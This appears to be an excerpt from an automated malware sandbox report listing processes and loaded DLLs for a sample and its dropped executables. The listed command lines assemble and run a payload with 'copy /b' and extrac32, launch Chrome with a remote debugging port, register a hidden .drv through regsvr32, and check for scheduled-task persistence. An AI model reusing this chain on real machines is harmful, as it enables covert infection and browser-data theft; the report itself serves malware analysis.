Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 567757	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Activation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "VIETNAM" Diagnostic	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 567757\Appeal.com + Entirely + Thumbnails + Atmospheric + Eternal + Quite + Strictly + Mongolia + Card + Decent 567757\Appeal.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Tuner + ..\Rest + ..\Reservation + ..\Twiki j	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Appeal.com j	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Process created: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe "C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe"
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Process created: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe "C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1888 -ip 1888
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 948
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe	Process created: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp "C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp" /SL5="$100068,3422545,56832,C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe"
Source: C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp	Process created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe "C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe" -i
Source: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe	Process created: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp "C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp" /SL5="$2043A,1104885,161792,C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe"
Source: C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp	Process created: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe "C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe	Process created: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp "C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp" /SL5="$30440,1104885,161792,C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: unknown unknown
Source: C:\Windows\System32\regsvr32.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2192,i,17195581818120426655,15686609209049494560,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2E02vIiMfd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\567757\Appeal.com	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	Section loaded: ucrtbase_clr0400.dll
